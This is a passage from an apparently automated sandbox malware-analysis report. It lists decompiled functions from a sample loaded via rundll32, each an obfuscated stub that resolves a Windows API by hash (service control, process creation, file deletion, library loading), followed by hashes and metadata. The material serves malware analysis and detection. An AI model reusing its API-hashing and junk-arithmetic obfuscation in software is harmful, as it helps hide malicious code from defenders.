				_push(0);
				E0023602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002407A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0023295f
0x00232964
0x00232967
0x0023296a
0x0023296d
0x0023296e
0x0023296f
0x00232977
0x00232985
0x0023298a
0x00232992
0x0023299a
0x002329a2
0x002329a9
0x002329b0
0x002329b7
0x002329bb
0x002329cf
0x002329dc
0x002329e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002329DC

Strings

<^, xrefs: 00232977

Memory Dump Source

Source File: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2108491568.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2108565252.000000000024C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_230000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 4bda07148f96ae91c4ea11f07c8683422217309d709d9b2cf065ab4d5bd33d78
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 5E015B72A00108BBEB18DF95DC4A8DFBFB6EF44310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0023C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0023C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0023602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002407A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0023c6e1
0x0023c6e6
0x0023c6f0
0x0023c6fc
0x0023c703
0x0023c706
0x0023c70d
0x0023c711
0x0023c715
0x0023c71c
0x0023c723
0x0023c72a
0x0023c731
0x0023c738
0x0023c751
0x0023c762
0x0023c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0023C762

Strings

/O, xrefs: 0023C6E6

Memory Dump Source

Source File: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2108491568.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2108565252.000000000024C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_230000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 8d8e337f00c3192cdd29c10cc9b4f922268430cbab26b068a59f539cbbc88e3d
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 9C1133B290122DBBCB25DF95DC4A8EFBFB8EF04714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00231000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00231000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0023602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002407A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00231006
0x00231009
0x0023100c
0x00231011
0x00231016
0x0023101d
0x00231026
0x0023102d
0x00231034
0x0023103b
0x00231047
0x0023104f
0x00231057
0x0023105e
0x00231065
0x0023106c
0x00231073
0x00231077
0x0023108b
0x00231096
0x0023109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00231096

Strings

[, xrefs: 0023103B

Memory Dump Source

Source File: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2108491568.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2108565252.000000000024C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_230000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: e58eb9bd9a0dd2f4184544d5c7de3129890655c1ea17d86febe5a0eb92b555e5
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: AE015BB6D01308BBDF04DF94C94A5DEBBB1AB54318F108188E51466291D3B19B649F91

Uniqueness

Uniqueness Score: -1.00%

Function 00234859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00234859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002407A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0023485e
0x0023487a
0x0023487d
0x00234884
0x0023488b
0x00234892
0x0023489d
0x002348a0
0x002348ad
0x002348b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002348B7

Strings

[, xrefs: 0023488B

Memory Dump Source

Source File: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2108491568.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2108565252.000000000024C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_230000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 7b45bb183b61e0dc11828fde01c81c53077722e1bcb1deb7bc3696ed0e51f854
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 7CF017B0A15209FBDB08CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B51

Uniqueness

Uniqueness Score: -1.00%

Function 00244F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00244F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002407A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00244f80
0x00244f81
0x00244f82
0x00244f86
0x00244f87
0x00244f8c
0x00244fa5
0x00244fa8
0x00244faf
0x00244fb6
0x00244fc7
0x00244fca
0x00244fd7
0x00244fe2
0x00244fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00244FE2

Strings

{#lm, xrefs: 00244FC2

Memory Dump Source

Source File: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2108491568.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2108565252.000000000024C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_230000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: d9e351559df2f839ea3f993d8248c07b88d719110bbe9f1616a24110082f9faf
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 8FF037B082120CFFDB08DFA4D98689EBFBAEB40300F208199E804AB250D3715B509B51

Uniqueness

Uniqueness Score: -1.00%

Function 0024976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E0024976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002407A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00249772
0x00249773
0x00249778
0x0024977a
0x0024977b
0x0024977e
0x0024977f
0x00249782
0x00249785
0x00249788
0x00249789
0x0024978c
0x0024978f
0x00249790
0x00249791
0x00249794
0x00249797
0x0024979a
0x0024979d
0x002497a0
0x002497a3
0x002497a6
0x002497a7
0x002497a8
0x002497ad
0x002497b7
0x002497c3
0x002497ca
0x002497d1
0x002497d8
0x002497df
0x002497e3
0x002497fc
0x00249816
0x0024981d

APIs

CreateProcessW.KERNEL32(0023591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0023591A), ref: 00249816

Memory Dump Source

Source File: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2108491568.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2108565252.000000000024C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_230000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 8aaaab428069adbc48d01d1842b8f6c1b76137c32856cc0d43b623e32781480e
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: E911B372911148BBDF199FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0023B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0023B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0023602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002407A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0023b569
0x0023b56a
0x0023b56d
0x0023b572
0x0023b574
0x0023b577
0x0023b57a
0x0023b57d
0x0023b580
0x0023b583
0x0023b586
0x0023b587
0x0023b58a
0x0023b58d
0x0023b590
0x0023b593
0x0023b594
0x0023b595
0x0023b59a
0x0023b5a4
0x0023b5b8
0x0023b5c0
0x0023b5c4
0x0023b5cb
0x0023b5d2
0x0023b5d9
0x0023b5e6
0x0023b5fd
0x0023b604

APIs

CreateFileW.KERNELBASE(00240668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00240668,?,?,?,?), ref: 0023B5FD

Memory Dump Source

Source File: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2108491568.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2108565252.000000000024C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_230000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: ae4d34fd2688908d7b37844e0c7cd486ab6290dc1b62701abbb9e3509a401dc7
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: E911C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB51

Uniqueness

Uniqueness Score: -1.00%

Function 0024981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0024981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002407A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00249821
0x00249822
0x00249825
0x00249828
0x0024982a
0x0024982c
0x0024982f
0x00249832
0x00249835
0x00249836
0x00249837
0x0024983c
0x00249855
0x00249858
0x0024985f
0x00249866
0x0024986d
0x00249874
0x0024987b
0x0024988e
0x0024989b
0x002498a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002387F2,0000CAAE,0000510C,AD82F196), ref: 0024989B

Memory Dump Source

Source File: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2108491568.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2108565252.000000000024C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_230000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 5c104816d0916b2f742d7da5e2f5af63a7c104f2388a3feb003ea95f8739dd8b
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 78015A76801208FBDB08EFD5DC46CDFBF79EF85750F108199F918A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00247BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00247BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002407A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00247bf7
0x00247bf8
0x00247bfa
0x00247bfd
0x00247bff
0x00247c02
0x00247c06
0x00247c07
0x00247c0f
0x00247c1d
0x00247c25
0x00247c2d
0x00247c31
0x00247c38
0x00247c3f
0x00247c46
0x00247c4a
0x00247c5e
0x00247c67
0x00247c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00247C67

Memory Dump Source

Source File: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2108491568.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2108565252.000000000024C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_230000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 770df398bab2141a37eb02192e8c8783d3f149e98fc0c61528bafcf87d895afb
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 0A014FB190120CFFEB09DF94C84A8DEBBB9EF44314F108198F50567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0023F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0023F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002407A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0023f662
0x0023f663
0x0023f665
0x0023f668
0x0023f66a
0x0023f66d
0x0023f670
0x0023f673
0x0023f677
0x0023f678
0x0023f67d
0x0023f687
0x0023f693
0x0023f69a
0x0023f6a1
0x0023f6a5
0x0023f6a9
0x0023f6b0
0x0023f6c9
0x0023f6d8
0x0023f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0023F6D8

Memory Dump Source

Source File: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2108491568.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2108565252.000000000024C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_230000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: b0aab0a77048a0e0be9577124c09f0a3f59ce9ddf5566f454e9b60349f3fc5fa
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: FC01E5B6901208BBEF059F94DC4A8DF7F79EB05324F148188F90462250D6B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0023B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0023B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0023602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002407A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0023b6f3
0x0023b6f8
0x0023b702
0x0023b70b
0x0023b712
0x0023b719
0x0023b720
0x0023b727
0x0023b72e
0x0023b747
0x0023b759
0x0023b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0023B759

Memory Dump Source

Source File: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2108491568.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2108565252.000000000024C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_230000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 793f8dda759908818510c1c0dcc9dcb3ef21eb4d32d3cbd2049d11a1b0679531
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: D60178B2950308FBEB45DF90DD06A9E7BB5EB08704F108188FA09261A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0024AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0024AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002407A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0024aa3f
0x0024aa40
0x0024aa41
0x0024aa44
0x0024aa47
0x0024aa4b
0x0024aa4c
0x0024aa51
0x0024aa5b
0x0024aa64
0x0024aa68
0x0024aa6f
0x0024aa76
0x0024aa8d
0x0024aa90
0x0024aa9d
0x0024aaa8
0x0024aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0024AAA8

Memory Dump Source

Source File: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2108491568.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2108565252.000000000024C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_230000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: d30233234a1f3f2a51f3f54581c7389b96fb4482909fd5c53c65e4e98134fc17
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: BBF069B191020CFFDF08DF94DD4A89EBFB8EB40304F108088F905A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00235FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00235FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002407A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00235fb5
0x00235fb6
0x00235fb7
0x00235fbb
0x00235fbc
0x00235fc1
0x00235fcb
0x00235fd7
0x00235fde
0x00235fe5
0x00235ffc
0x00235fff
0x00236006
0x0023600d
0x0023601a
0x00236025
0x0023602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00236025

Memory Dump Source

Source File: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2108491568.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2108565252.000000000024C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

